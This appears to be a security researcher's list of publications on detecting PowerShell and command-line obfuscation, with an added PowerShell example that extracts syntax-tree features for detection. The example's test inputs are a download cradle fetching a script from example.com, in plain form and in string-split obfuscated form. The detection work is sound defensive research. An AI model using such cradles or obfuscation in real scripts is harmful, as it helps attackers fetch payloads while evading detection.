Co-authored with Mandiant's Nick Carr (@ItsReallyNick).
This blog post highlights several incremental obfuscation techniques our team observed threat actors FIN7, FIN8 and APT32 using in the wild during the first half of 2017.
Release Date: 2017-06-30
Link: https://www.fireeye.com/blog/threat-research/2017/06/obfuscation-in-the-wild.html
Co-authored with Microsoft's Lee Holmes (@Lee_Holmes).
This blog post and white paper outline the research methodology and data science techniques that Lee and I applied while developing Revoke-Obfuscation, the first Abstract Syntax Tree (AST)-based PowerShell obfuscation detection framework, which we released at Black Hat USA 2017 (video) and DEF CON 25 (video).
Release Date: 2017-07-27
Link: https://www.fireeye.com/blog/threat-research/2017/07/revoke-obfuscation-powershell.html
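To make the "AST-based" part of the entry above concrete, here is an added illustration (not Revoke-Obfuscation's code, and not the feature set from the paper) of what it means to measure a script at the syntax-tree level instead of matching on raw text: PowerShell's own parser builds the tree, and a handful of node counts and a nesting depth are extracted from it. The two download-cradle samples at the bottom are constructed for this example; the function name `Get-AstObfuscationIndicators` is likewise an assumption, not a cmdlet from the framework.

```powershell
# Added illustration of AST-level feature extraction; not Revoke-Obfuscation's code.
using namespace System.Management.Automation.Language

function Get-AstObfuscationIndicators {
    param([Parameter(Mandatory)][string]$ScriptText)

    # PowerShell's built-in parser returns the full AST plus the token stream;
    # obfuscation that fools regexes is still visible as structure here.
    $tokens = $null; $errors = $null
    $ast = [Parser]::ParseInput($ScriptText, [ref]$tokens, [ref]$errors)

    $all     = @($ast.FindAll({ $true }, $true))
    $strings = @($ast.FindAll({ param($n) $n -is [StringConstantExpressionAst] }, $true))
    $concats = @($ast.FindAll({ param($n) $n -is [BinaryExpressionAst] -and $n.Operator -eq 'Plus' }, $true))
    $formats = @($ast.FindAll({ param($n) $n -is [BinaryExpressionAst] -and $n.Operator -eq 'Format' }, $true))
    $invokes = @($ast.FindAll({ param($n) $n -is [InvokeMemberExpressionAst] }, $true))

    # Deepest node in the tree: token-splitting and wrapping nest expressions far
    # more deeply than hand-written administration scripts usually do.
    $maxDepth = 0
    foreach ($node in $all) {
        $depth = 0; $p = $node
        while ($p.Parent) { $depth++; $p = $p.Parent }
        if ($depth -gt $maxDepth) { $maxDepth = $depth }
    }

    $concatPerNode = 0
    if ($all.Count -gt 0) { $concatPerNode = [math]::Round($concats.Count / $all.Count, 3) }

    [pscustomobject]@{
        NodeCount         = $all.Count
        StringConstants   = $strings.Count
        ConcatOperators   = $concats.Count
        FormatOperators   = $formats.Count
        MemberInvocations = $invokes.Count
        MaxDepth          = $maxDepth
        ConcatPerNode     = $concatPerNode
        ParseErrors       = @($errors).Count
    }
}

# Constructed samples (not from the paper): the same download cradle, plain and
# with string-splitting obfuscation applied to the type name, method name and URL.
$plain = '(New-Object Net.WebClient).DownloadString("http://example.com/a.ps1")'
$obfus = '(New-Object ("Ne"+"t.We"+"bCl"+"ient")).("Down"+"load"+"String").Invoke(("http://"+"example.com"+"/a.ps1"))'

Get-AstObfuscationIndicators -ScriptText $plain
Get-AstObfuscationIndicators -ScriptText $obfus
```

Run it in any PowerShell 5+ session; the obfuscated sample produces a markedly larger node count, many `+` operators and a deeper tree for what is semantically the same command, which is the kind of signal a classifier can be trained on without ever looking at the literal strings an attacker can freely vary.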
This blog post and white paper outline the research methodology and detection development approaches that I applied during the DOSfuscation research, which I released at Black Hat Asia 2018 (video) along with the Invoke-DOSfuscation framework.
Release Date: 2018-03-23